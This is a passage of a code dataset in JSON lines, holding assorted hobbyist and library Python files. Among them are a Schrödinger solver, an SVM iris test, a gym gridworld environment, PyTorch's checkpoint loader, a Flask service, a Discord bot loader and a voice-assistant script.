psi_0_l[0]=0+0j\n psi_0_u[-1]=0+0j\n\n b=spacing\n psi_t_x = psi_0 + (-1j*b/h_bar)*(((-h_bar**2/(2*m*a**2))*(psi_0_u-2*psi_0+psi_0_l))+np.multiply(psi_0,V))\n return psi_t_x/np.sqrt((np.sum(np.multiply(np.conj(psi_t_x),psi_t_x))))/2\n\n\nmax_time = 100\nmin_grid = 0\nmax_grid = 1000\ngridpoints = 500\nh_bar=1\nm=1\na = 2\ndef gaussian(x, mu, sig):\n return 1./(math.sqrt(2.*math.pi)*sig)*np.exp(-np.power((x - mu)/sig, 2.)/2)\n\ndef V(x):\n return (0.001*(x-500))\n\nx = grid(min_grid, max_grid, gridpoints)\npsi_0 = signal.gaussian(500, std=10)+0j\n\n\n\nC = potential(x, V)\n\nprint(C.dtype)\nprint(psi_0.dtype)\nprint(x.dtype)\ntimegrid = timegrid(max_time, spacing)\nfor i in range(1000000):\n psi_0 = solver(psi_0, C)\n\n\n\n\n\n\nprint(psi_0.dtype)\nplt.plot(x, np.power(np.absolute(psi_0),2))\n#plt.plot(x, C)\nplt.show()\n","repo_name":"MZauchner/SchroedingerSolver","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18828963480","text":"from SVM.SVC import svc\nfrom numpy import mat\n\n# 三分类\n# 分类方法:有向无环图(DirectedAcyclic Graph)\n\ndataMat = [] # 训练集\ntestMat = [] # 测试集\nfile = open('D:\\\\PycharmProjects\\\\srpProject\\\\data\\\\iris')\ncounter = 0\n\n# 统一选取前40个作为训练集,后10个作为测试集\n\n# 读取训练集\nfor line in file.readlines():\n lineArr = line.strip().split(' ')\n dataMat.append([float(lineArr[1]), float(lineArr[2]), float(lineArr[3]), float(lineArr[4])])\n\n# 读取测试集\nfre = open('D:\\\\PycharmProjects\\\\srpProject\\\\data\\\\iris_test')\n\nfor line in fre.readlines():\n data = line.strip().split(' ')\n testMat.append([float(data[1]), float(data[2]), float(data[3]), float(data[4])])\n\n# 训练 (n-1)*n/2 = 3个分类器\n\n# 配置参数\nC = 0.8\ntol = 0.01\nmaxIter = 30\nkTup = ['rbf', 0.5]\n\n# setosa与versicolor\nsvm_sve = svc(dataMat[0:80], [-1] * 40 + [1] * 40, C, tol, maxIter, kTup)\n\n# setosa与virginica\nsvm_svi = svc(dataMat[0:40] + dataMat[81:120], [-1] * 40 + [1] * 40, C, tol, maxIter, kTup)\n\n# versicolor与virginica\nsvm_vevi = svc(dataMat[41:120], [-1] * 40 + [1] * 40, C, tol, maxIter, kTup)\n\nresult = 0\ni = 0\n\nfor dataArr in testMat:\n\n # 回答 setosa还是versicolor\n\n pri1 = svm_sve.predict(dataArr)\n\n if pri1 < 0: # 认为不是versicolor\n\n print(\"predict not versicolor \", end=' ')\n\n # 回答setosa还是virginica\n print(i, end=': ')\n print(\"predict:\", end=\"\")\n\n pri2 = svm_svi.predict(dataArr)\n\n if pri2 < 0: # 认为是setosa\n print(\"setosa\", end='')\n if 0 <= i < 10:\n print(\",prediction RIGHT\")\n result += 1\n else:\n print(\",prediction WRONG\")\n elif pri2 > 0: # 认为是virginica\n print(\"virginica\", end=\"\")\n if 20 <= i < 30:\n print(\",prediction RIGHT\")\n result += 1\n else:\n print(\",prediction WRONG\")\n else:\n print(\"Error!\")\n\n elif pri1 > 0: # 认为不是setosa\n\n print(\"predict not setosa \", end=' ')\n\n # 回答versicolor还是virginica\n\n pri2 = svm_vevi.predict(dataArr)\n\n print(i, end=': ')\n print(\"predict:\", end=\"\")\n\n if pri2 < 0: # 认为是versicolor\n print(\"versicolor\", end=\"\")\n if 10 <= i < 20:\n print(\",prediction RIGHT\")\n result += 1\n else:\n print(\",prediction WRONG\")\n elif pri2 > 0: # 认为是virginica\n print(\"virginica\", end=\"\")\n if 20 <= i < 30:\n print(\",prediction RIGHT\")\n result += 1\n else:\n print(\",prediction WRONG\")\n else:\n print(\"Error!\")\n\n else:\n print(\"Error!\")\n i += 1\n\nprint()\nprint(result / 30)\n","repo_name":"HanhengHe/srpProject","sub_path":"SVM/test/2019-8-31/trible_test.py","file_name":"trible_test.py","file_ext":"py","file_size_in_byte":2872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"21483173029","text":"class Car:\n def __init__(self, size, brand, seats):\n self.color = \"white\"\n self.size = size\n self.brand = brand\n self.seats = seats\n def paint(self):\n print(\"What color do you want to print the car?\")\n ans = input()\n self.color = ans\ncar1 = Car(\"medium\", \"toyota\", 4)\ncar1.paint()\nprint(car1.color)\n","repo_name":"notusknot/python-programs","sub_path":"objectoriented.py","file_name":"objectoriented.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6125156116","text":"import csv\nPremBig6 = [\"Manchester United\", \"Chelsea\", \"Tottenham Hotspur\", \"Manchester City\", \"Arsenal\", \"Liverpool\"]\nChampionsLeagueClub = [\"FC Barcelona\", \"Manchester United\", \"Chelsea\", \"Tottenham Hotspur\", \"Manchester City\", \"Arsenal\", \"Liverpool\", \"Juvents\", \"Paris Saint-Germain\",\n\"Real Madrid\", \"Napoli\", \"Milan\", \"Lazio\", \"Inter\", \"Roma\", \"FC Porto\", \"Valencia CF\", \"FC Bayern München\"]\nGoodValueClubs = [\"Ajax\", \"Stade Rennais FC\", \"LOSC Lille\"]\nwith open('playerdata.csv', encoding=\"utf8\") as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n potenitals = []\n for row in csv_reader:\n if line_count == 0:\n line_count += 1\n elif line_count < 50000:\n if (row[9] in GoodValueClubs and int(row[3]) < 24 and int(row[3]) > 19):\n print(f'\\t{row[2]} is {row[3]} years old, and plays for {row[9]}.')\n potenitals.append(row[2])\n line_count += 1\n print(f'Processed {line_count} lines.')\n print(len(potenitals))","repo_name":"Reikon95/FootballStats2019","sub_path":"CSVReader.py","file_name":"CSVReader.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"37631627791","text":"from torch.utils.data import Dataset, DataLoader\nfrom torchvision.datasets import CIFAR10\nimport torchvision.transforms as transforms\n\n\ndef load_data(args):\n train_transform = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n ])\n train_dataset = CIFAR10('./data', train=True, transform=train_transform, download=True)\n\n train_loader = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True, num_workers=args.num_workers)\n\n test_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n ])\n test_dataset = CIFAR10('./data', train=False, transform=test_transform, download=True)\n\n test_loader = DataLoader(test_dataset, batch_size=args.batch_size, shuffle=False, num_workers=args.num_workers)\n\n return train_loader, test_loader","repo_name":"Luhuanz/pytorch_project","sub_path":"transformer/BottleneckTransformers/BottleneckTransformers-main/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":303,"dataset":"github-code","pt":"72"} +{"seq_id":"22170153295","text":"import gym\nfrom gym import spaces\nimport numpy as np\n\nclass GridworldContNormalEnv(gym.Env):\n\n\tdef __init__(self, mean=[0,0,0,0], var=[1,1,1,1]):\n\n\t\tself.DIM = 5\n\t\tself.MAX_SPEED = 1\n\t\tself.END_DISTANCE = 0.75\n\n\t\tself.max_action = np.array([self.MAX_SPEED,self.MAX_SPEED])\n\t\tself.max_position = np.array([self.DIM/2,self.DIM/2,self.DIM/2,self.DIM/2])\n\n\t\tself.observation_space = spaces.Box(-self.max_position, self.max_position, dtype=np.float32)\n\t\tself.action_space = spaces.Box(-self.max_action, self.max_action, dtype=np.float32)\n\n\t\tself.mean = mean\n\t\tself.var = var\n\n\tdef dist(self,p1,p2):\n\t\treturn np.linalg.norm(p1-p2)\n\n\n\tdef check_end(self,pos,dest):\n\t\tif self.dist(pos,dest) <= self.END_DISTANCE:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\n\tdef reset(self):\n\t\t\n\t\tx,y = np.random.normal(loc=self.mean[0:2],scale=np.sqrt(self.var[0:2]))\n\t\t#if abs(x)>self.DIM/2 or abs(y)>self.DIM/2:\n\t\t#\tx = np.random.uniform(-2.5,2.5)\n\t\t#\ty = np.random.uniform(-2.5,2.5)\n\n\t\txg,yg = np.random.normal(loc=self.mean[2:4],scale=np.sqrt(self.var[2:4]))\n\t\t#if abs(xg)>self.DIM/2 or abs(yg)>self.DIM/2:\n\t\t#\txg = np.random.uniform(-2.5,2.5)\n\t\t#\tyg = np.random.uniform(-2.5,2.5)\n\n\t\tpos = np.array([x,y],dtype=np.float32)\n\t\tdest = np.array([xg,yg],dtype=np.float32)\n\n\t\twhile self.check_end(pos,dest) or abs(x)>self.DIM/2 or abs(y)>self.DIM/2 or abs(xg)>self.DIM/2 or abs(yg)>self.DIM/2:\n\t\t\tx,y = np.random.normal(loc=self.mean[0:2],scale=np.sqrt(self.var[0:2]))\n\t\t\t#if abs(x)>self.DIM/2 or abs(y)>self.DIM/2:\n\t\t\t#\tx = np.random.uniform(-2.5,2.5)\n\t\t\t#\ty = np.random.uniform(-2.5,2.5)\n\n\t\t\txg,yg = np.random.normal(loc=self.mean[2:4],scale=np.sqrt(self.var[2:4]))\n\t\t\t#if abs(xg)>self.DIM/2 or abs(yg)>self.DIM/2:\n\t\t\t#\txg = np.random.uniform(-2.5,2.5)\n\t\t\t#\tyg = np.random.uniform(-2.5,2.5)\n\n\t\t\tpos = np.array([x,y],dtype=np.float32)\n\t\t\tdest = np.array([xg,yg],dtype=np.float32)\n\n\t\tself.state = np.array([x,y,xg,yg],dtype=np.float32)\n\t\treturn self.state\n\t\n\n\tdef step(self, action):\n\n\t\tassert action.shape == self.action_space.shape\n\n\t\tx,y,xg,yg = self.state\n\t\tpos = np.array([x,y],dtype=np.float32)\n\t\tdest = np.array([xg,yg],dtype=np.float32)\n\t\t\n\t\t# clip action to max_speed\n\t\t#action_norm = np.linalg.norm(action)\n\t\t#action = action if action_norm<=self.MAX_SPEED else action*(self.MAX_SPEED/action_norm)\n\n\t\tdx = action[0]\n\t\tdy = action[1]\n\n\t\tif np.abs(dx) > self.MAX_SPEED:\n\t\t\tdx = dx/np.abs(dx)\n\t\tif np.abs(dy) > self.MAX_SPEED:\n\t\t\tdy = dy/np.abs(dy)\n\n\t\tx += dx\n\t\ty += dy\n\n\t\tnewstate = np.array([x,y,xg,yg],dtype=np.float32)\n\t\tnp.clip(newstate,-self.max_position,self.max_position,newstate)\n\t\tx,y,xg,yg = newstate\n\t\tself.state = newstate\n\n\t\tpos = np.array([x,y],dtype=np.float32)\n\t\tdone = self.check_end(pos,dest)\n\t\tif done:\n\t\t\treward = 0\n\t\telse:\n\t\t\treward = -1\n\t\t\n\t\treturn self.state, reward, done","repo_name":"nondecidibile/cmdp","sub_path":"gym/envs/toy_text/gridworld_cont_normal.py","file_name":"gridworld_cont_normal.py","file_ext":"py","file_size_in_byte":2774,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"27459906670","text":"a = input(\"Enter the name of the file with extension: \")\n\nlines=words=chars=0\n\nwith open(a, 'r') as f:\n\tfor line in f:\n\t\tword = line.split(' ')\n\t\tlines+=1\n\t\twords+=len(word)\n\t\tchars+=len(line)\n\nprint(\"Number of Lines = %d\\nNumber of Words = %d\\nNumber of Characters = %d\" % (lines, words, chars))\n","repo_name":"nirmalnishant645/Python-Programming","sub_path":"Practice-Problems/File-Handling/FileStat.py","file_name":"FileStat.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"34744009533","text":"def readfile():\n infile = open('WorldSeries.txt','r')\n timeswon = dict()\n teamwon = dict()\n year = 1903\n team = infile.readline()\n dontskip = True\n while team != '':\n team = team.rstrip('\\n')\n if team in timeswon:\n timeswon[team] += 1\n elif team.startswith('World'):\n dontskip = False\n else:\n timeswon[team] = 1\n if dontskip:\n teamwon[year] = team\n year += 1\n team = infile.readline()\n dontskip = True\n return teamwon,timeswon\ndef main():\n teamwon, timeswon = readfile()\n selection = int(input('Choose a year between 1903 and 2009: '))\n while selection == 1904 or selection == 1994:\n print('There was no world cup in',selection)\n selection = int(input('Choose another year:'))\n print(teamwon[selection],'won the World Cup in',selection)\n print('In total they won,',timeswon[teamwon[selection]],'times.')\nmain()","repo_name":"legendbabs/StartingOutWithPython","sub_path":"StartOutWithPython/Chapter09/ProgrammingExercises/world_series2.py","file_name":"world_series2.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"14831618279","text":"from typing import Any, Dict, Optional\n\nimport torch\nimport torch.distributed as dist\n\nfrom .storage import (\n StorageReader,\n)\nfrom .planner import LoadPlanner\nfrom .default_planner import DefaultLoadPlanner\n\nfrom .utils import _DistWrapper\n\n__all__ = [\"load_state_dict\"]\n\n\ndef load_state_dict(\n state_dict: Dict[str, Any],\n storage_reader: StorageReader,\n process_group: Optional[dist.ProcessGroup] = None,\n coordinator_rank: int = 0,\n no_dist: bool = False,\n planner: Optional[LoadPlanner] = None,\n) -> None:\n \"\"\"\n Loads a distributed ``state_dict`` in SPMD style.\n\n Each rank will try to read the least amount of data necessary\n to fullfill the requested `state_dict`. When loading :class:`ShardedTensor`\n instances, each rank only reads data for their local shards.\n\n .. warning::\n All tensors in ``state_dict`` must be allocated on their\n destination device *prior to* calling this function.\n\n All non-tensor data is loaded using `torch.load()` and modified in place\n on state_dict.\n\n .. warning::\n Users must call `load_state_dict` on the root module to ensure load\n pos-processing and non-tensor data properly propagates.\n\n .. note:\n This function can be used for local inference and load a checkpoint\n produced by ``save_state_dict`` without having a process group initialized\n by passing ``no_dist=True`` and by using Tensors instead of ShardedTensors.\n\n Args:\n state_dict (Dict[str, Any]) : The state_dict to load. Note that this\n state dict will updated in place.\n storage_reader (StorageReader): StorageReader used to load data from.\n process_group (ProcessGroup):\n ProcessGroup to be used for cross-rank synchronization.\n coordinator_rank (int):\n Rank to use to coordinate the checkpoint.\n rank0 is used by default.\n no_dist (bool): If ``True``, distributed checkpoint will not load\n in SPMD style. (Default: ``False``)\n\n Returns:\n None.\n\n Examples\n >>> # xdoctest: +SKIP\n >>> my_model = MyModule()\n >>> optimizer = Adagrad(my_model.parameters())\n >>> model_state_dict = my_model.state_dict()\n >>> fs_storage_reader = torch.distributed.checkpoint.FileSystemReader(\"/checkpoint/1\")\n\n >>> torch.distributed.checkpoint.load_state_dict(\n >>> state_dict=model_state_dict,\n >>> storage_reader=fs_storage_reader,\n >>> )\n\n >>> # module.load_state_dict() function might have customized steps\n >>> # to flush the state_dict, must call it to\n >>> # ensure correct behavior.\n >>> my_model.load_state_dict(model_state_dict)\n\n .. note::\n load_state_dict uses collectives to coordinate reads across ranks.\n For NCCL-based process groups, internal tensor representations of\n objects must be moved to the GPU device before communication takes place.\n In this case, the device used is given by ``torch.cuda.current_device()``\n and it is the user's responsibility to ensure that this is set so that each\n rank has an individual GPU, via ``torch.cuda.set_device()``.\n \"\"\"\n\n torch._C._log_api_usage_once(\"torch.distributed.checkpoint.load_state_dict\")\n\n distW = _DistWrapper(process_group, not no_dist, coordinator_rank)\n if planner is None:\n planner = DefaultLoadPlanner()\n\n def local_step():\n assert planner is not None\n metadata = storage_reader.read_metadata()\n planner.set_up_planner(state_dict, metadata, distW.is_coordinator)\n storage_reader.set_up_storage_reader(metadata, distW.is_coordinator)\n\n local_plan = planner.create_local_plan()\n local_plan = storage_reader.prepare_local_plan(local_plan)\n return local_plan\n\n def global_step(all_local_plans):\n assert planner is not None\n all_local_plans = planner.create_global_plan(all_local_plans)\n all_local_plans = storage_reader.prepare_global_plan(all_local_plans)\n return all_local_plans\n\n central_plan = distW.reduce_scatter(\"plan\", local_step, global_step)\n\n def read_data():\n assert planner is not None\n final_local_plan = planner.finish_plan(central_plan)\n all_reads = storage_reader.read_data(final_local_plan, planner)\n\n all_reads.wait()\n return None\n\n _ = distW.all_gather(\"read\", read_data)\n","repo_name":"pytorch/pytorch","sub_path":"torch/distributed/checkpoint/state_dict_loader.py","file_name":"state_dict_loader.py","file_ext":"py","file_size_in_byte":4455,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"16653929100","text":"import random\nfrom functools import wraps\nfrom string import ascii_letters\n\n\ndef lower_string(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n result = func(*args, **kwargs)\n return result.lower()\n return wrapper\n\ndef shorten_string(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n result = func(*args, **kwargs)\n return result[:40]\n return wrapper\n\ndef title_string(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n result = func(*args, **kwargs)\n return result.title()\n return wrapper\n\n\n\n@title_string\n@lower_string\n@shorten_string\ndef random_string():\n random_string = \"\"\n characters = ascii_letters + \" . , ! ?\"\n for _ in range(random.randint(7,70)):\n random_string += random.choice(characters)\n return random_string\n\n\n\nif __name__ == \"__main__\":\n print(\"-\".ljust(40, \"-\"))\n for _ in range(7):\n print(random_string())\n print(\"-\".ljust(40, \"-\"))","repo_name":"solomoniosif/SDA_Python_Exercises","sub_path":"13_2_21_python_intermediate/exercise_01.py","file_name":"exercise_01.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29142722162","text":"# main.py\nimport discord\nfrom discord.ext import commands\nimport os\n\ndef main2():\n prefix = '!'\n intents = discord.Intents.all()\n\n client = commands.Bot(command_prefix=prefix, intents = intents)\n\n for filename in os.listdir('파일경로'):\n if '.py' in filename:\n filename = filename.replace('.py', '')\n client.load_extension(f\"command.{filename}\")\n\n with open('토큰 파일 경로', 'r') as f:\n token1 = f.read()\n \n\n client.run(token1) #여기서 오류가 뜬다면 디스코드 봇 설정에 가서 확인해보기 중요!!\n\nif __name__ == '__main__':\n main2()\n","repo_name":"Magin-a/Codeuniv","sub_path":"백준고양이 봇/DAY1.py","file_name":"DAY1.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"51082229","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom search.martylib.protobuf_utils.patch import patch_enums\nfrom search.martylib.test_utils import TestCase\n\n\nclass TestPatch(TestCase):\n def test_patch_enums(self):\n from search.martylib.proto.structures import test_pb2\n\n patch_enums()\n\n self.assertEqual(\n getattr(test_pb2.TopLevelEnum, 'NULL'),\n 0,\n )\n self.assertEqual(\n getattr(test_pb2.Alpha.AlphaNestedEnum, 'N_NULL'),\n 0,\n )\n\n # Make sure values from different enums aren't mixed.\n self.assertFalse(\n hasattr(test_pb2.TopLevelEnum, 'N_NULL')\n )\n self.assertFalse(\n hasattr(test_pb2.Alpha.AlphaNestedEnum, 'NULL')\n )\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"Search engine/test_protobuf_utils/test_patch.py","file_name":"test_patch.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33006412289","text":"import time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nclass DateSelection():\n def selected_date(self):\n baseurl='https://www.expedia.com'\n driver=webdriver.Chrome()\n driver.maximize_window()\n driver.implicitly_wait(10)\n driver.get(baseurl)\n clickCale=driver.find_element(By.ID,\"d1-btn\")\n clickCale.click()\n # selecDate=driver.find_element(By.XPATH,\"//button[contains(@data-day,'22') and contains(@aria-label,'Jul')][1]\")\n # selecDate.click()\n self.DateS=driver.find_element(By.XPATH,\"//button[contains(@data-stid,'apply-date-picker')and contains(text(),'Done')]\")\n self.DateS.click()\n time.sleep(3)\n driver.quit()\n\n\n\nob=DateSelection()\nob.selected_date()","repo_name":"diyarammb/scrape_date_of_calender_using_python","sub_path":"Calender_selection.py","file_name":"Calender_selection.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5067593288","text":"import sys\nimport itertools\nimport subprocess\nimport numpy as np\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\nfrom shutil import rmtree\nfrom os import environ, mkdir, path\nimport tabulate_results\n\n\nget_results_only = False\n\nswitch_gpus = False #For multiple GPUs\nn_parallel_threads = 16\n\n# Set Hyper-parameters\nargs = dict()\n# The names should be the same as argument names in parser.py\nargs['hyper_params'] = ['dataset','lr', 'l2','drop_in', 'drop_out', 'wce']\ncustom = '_5_'\nnow = datetime.now()\nargs['timestamp'] = str(now.month)+'|'+str(now.day)+'|'+str(now.hour)+':'+str(now.minute)+':'+str(now.second) + custom # '05|12|03:41:02' # Month | Day | hours | minutes (24 hour clock)\n\nargs['dataset'] = ['facebook', 'amazon']\nargs['lr'] = [1e-2]#, 1e-5]\nargs['l2'] = [1e-2, 1e-4]#, 1e-5]\nargs['drop_in'] = [0.25]#, 0.5]\nargs['drop_out'] = [0.5]\nargs['wce'] = [1]\n\npos = args['hyper_params'].index('dataset')\nargs['hyper_params'][0], args['hyper_params'][pos] = args['hyper_params'][pos], args['hyper_params'][0]\n\n\nif not get_results_only:\n def diff(t_a, t_b):\n t_diff = relativedelta(t_a, t_b)\n return '{h}h {m}m {s}s'.format(h=t_diff.hours, m=t_diff.minutes, s=t_diff.seconds)\n\n # Create Args Directory to save arguments\n args_path = 'args'\n if not path.exists(args_path):\n mkdir(args_path)\n np.save(path.join('args', args['timestamp']), args)\n\n #Create Log Directory for stdout Dumps\n stdout_dump_path = 'stdout_dumps'\n if not path.exists(stdout_dump_path ):\n mkdir(stdout_dump_path)\n\n param_values = []\n this_module = sys.modules[__name__]\n for hp_name in args['hyper_params']:\n param_values.append(args[hp_name])\n combinations = list(itertools.product(*param_values))\n n_combinations = len(combinations)\n print('Total no of experiments: ', n_combinations)\n\n pids = [None] * n_combinations\n f = [None] * n_combinations\n last_process = False\n for i, setting in enumerate(combinations):\n #Create command\n command = \"python __main__.py \"\n folder_suffix = args['timestamp']\n for name, value in zip(args['hyper_params'], setting):\n command += \"--\" + name + \" \" + str(value) + \" \"\n if name != 'dataset':\n folder_suffix += \"_\"+str(value)\n command += \"--\" + \"folder_suffix \" + folder_suffix\n print(i+1, '/', n_combinations, command)\n\n if switch_gpus and (i % 2) == 0:\n env = dict(environ, **{\"CUDA_DEVICE_ORDER\": \"PCI_BUS_ID\", \"CUDA_VISIBLE_DEVICES\": \"1\"})\n else:\n env = dict(environ, **{\"CUDA_DEVICE_ORDER\": \"PCI_BUS_ID\", \"CUDA_VISIBLE_DEVICES\": \"0\"})\n\n name = path.join(stdout_dump_path, folder_suffix)\n with open(name, 'w') as f[i]:\n pids[i] = subprocess.Popen(command.split(), env=env, stdout=f[i])\n if i == n_combinations-1:\n last_process = True\n if ((i+1) % n_parallel_threads == 0 and i >= n_parallel_threads-1) or last_process:\n if last_process and not ((i+1) % n_parallel_threads) == 0:\n n_parallel_threads = (i+1) % n_parallel_threads\n start = datetime.now()\n print('########## Waiting #############')\n for t in range(n_parallel_threads-1, -1, -1):\n pids[i-t].wait()\n end = datetime.now()\n print('########## Waiting Over######### Took', diff(end, start), 'for', n_parallel_threads, 'threads')\n\n # Tabulate results in xls\n tabulate_results.write_results(args)\n\nelse:\n tabulate_results.write_results(args)\n print(\"DOne tabulation\")\n\n","repo_name":"PriyeshV/DCI","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23658409424","text":"#!/usr/bin/env python\n# Python Network Programming Cookbook, Second Edition -- Chapter - 7\n# This program is optimized for Python 2.7.12 and Python 3.5.2.\n# It may run on any other version with/without modifications.\n\nfrom flask import Flask\napp = Flask(__name__)\n\n@app.route('/')\ndef index(num=1):\n return \"Your Python Web Service
Fibonacci(\"+ str(num) + \"): \"+ str(fibonacci(num))+ \"
Square(\"+ str(num) + \"): \"+ str(square(num))\n\ndef fibonacci(n):\n if n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n return fibonacci(n-1) + fibonacci(n-2)\n\n\ndef square(n):\n print (\"Calculating for the number %s\" %n)\n return n*n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"PacktPublishing/Python-Network-Programming-Cookbook-Second-Edition","sub_path":"Chapter07/7_7_create_restful_webservice.py","file_name":"7_7_create_restful_webservice.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":148,"dataset":"github-code","pt":"72"} +{"seq_id":"3601177449","text":"import os\r\nrootdir = r'C:/Users/xiaoji/Desktop/result/result1'\r\n\r\nfor a,b,filenames in os.walk(rootdir):\r\n tk = r'domain-go.jp'\r\n for filename in filenames:\r\n if filename.find(tk)==-1:\r\n filenames.remove(filename)\r\n\r\nfor filename in filenames:\r\n fname = rootdir+r'/'+filename\r\n f = open(fname,'r+')\r\n data = f.read()\r\n f.close()\r\n data = data.replace(r'/warc/',r'/wet/')\r\n data = data.replace(r'.warc.gz','.warc.wet.gz')\r\n data = data.replace(r'crawl-data' , 'https://commoncrawl.s3.amazonaws.com/crawl-data')\r\n f = open(fname,'w+')\r\n f.write(data)\r\n f.close()\r\n","repo_name":"lli130/Crawl-web-pages-from-CommonCrawl","sub_path":"warc3.py","file_name":"warc3.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"7355223182","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom compareIslands import *\n\ndef compressColumns(df):\n\n #establish shortest column and grab its name\n shortestCol = 100000\n shortestColName = \"\"\n for col in df.columns:\n if df[col].count() < shortestCol: \n shortestCol = df[col].count()\n shortestColName = col\n\n\n #remove values and avg their neighbors against it to preserve movement. \n for col in df.columns:\n diff = df[col].count()-shortestCol\n if diff != 0:\n\n #generate a list to get the incrementing values\n nthF = df[col].count()/diff\n nth = int(nthF)\n colSeries = df[col]\n nthCounter = 0\n nthList = []\n \n #calculate avgs and delete rows\n for i in range(len(colSeries)):\n\n #count according to the incrementor, and round down. Add it to the List\n # - if i is in List, then perform our functions on it.\n nthCounter += nthF\n nthList.append(round(nthCounter))\n if i in nthList and i < len(df[shortestColName]):\n if i != 0 and i != len(df[shortestColName])-1:\n avgLower = (colSeries[i]+colSeries[i-1])/2\n avgUpper =(colSeries[i]+colSeries[i+1])/2\n colSeries.loc[i-1]= avgLower\n colSeries.loc[i+1] = avgUpper\n colSeries = colSeries.drop(index=i)\n elif i == 0:\n avg=(colSeries[i]+colSeries[i+1])/2\n colSeries.loc[i+1] = avg\n colSeries = colSeries.drop(index=i)\n else:\n avg=(colSeries[i]+colSeries[i-1])/2\n colSeries.loc[i-1]= avg\n colSeries = colSeries.drop(index=i)\n\n #reindex the column giving it the effect as if we removed the values and smashed it to match the shortest column\n oldIndex = list(colSeries.index)\n newIndex = list(df[shortestColName].index)\n indexDict = dict(zip(oldIndex,newIndex))\n\n print(colSeries.count())\n colSeries = colSeries.rename(index=indexDict)\n df[col] = colSeries\n return df\n\nislandDfs[2].to_csv(\"/Users/abram/Documents/PCC/perceptionAnalyzer/islandsDfs[0].csv\")\ncompressColumns(islandDfs[2]).to_csv(\"/Users/abram/Documents/PCC/perceptionAnalyzer/islandsDfs[0]Compressed.csv\")\n\n#plt.show()","repo_name":"abrhim/pcc-perceptionAnalaysis","sub_path":"compression.py","file_name":"compression.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"9464296071","text":"#https://www.acmicpc.net/problem/17210\n\ndoors = int(input())\nnum = int(input()) # 0: push 1: pull\n\nif doors > 5:\n print(\"Love is open door\")\n\nelse:\n for i in range(1, doors):\n print((num+i)%2)\n","repo_name":"yewonleee/AlgorithmProblemSolving","sub_path":"python/week1/3-4_이예원_20210709.py","file_name":"3-4_이예원_20210709.py","file_ext":"py","file_size_in_byte":206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14092780096","text":"import pyttsx3\nimport speech_recognition as sr\nimport datetime\nimport wikipedia\nimport webbrowser\n\nengine = pyttsx3.init('sapi5')\nvoices = engine.getProperty('voices')\nengine.setProperty('voice', voices[0].id)\n\ndef speak(audio):\n engine.say(audio)\n engine.runAndWait()\n \ndef wish():\n hour = datetime.datetime.now().hour\n if hour in range(0,12):\n speak(\"Good Morning\")\n elif hour in range(12,18):\n speak(\"Good Afternoon\")\n else:\n speak(\"Good Evening\")\n speak(\"I am rubic.\")\n\ndef takeCommand():\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"Listening......\")\n r.pause_threshold = 0.5\n audio = r.listen(source)\n try:\n print(\"Recognizing.........\")\n query = r.recognize_google(audio,language='en-in')\n print(f\"User said :{query}\\n\")\n\n except Exception as e:\n print(\"say that again please.....\")\n return 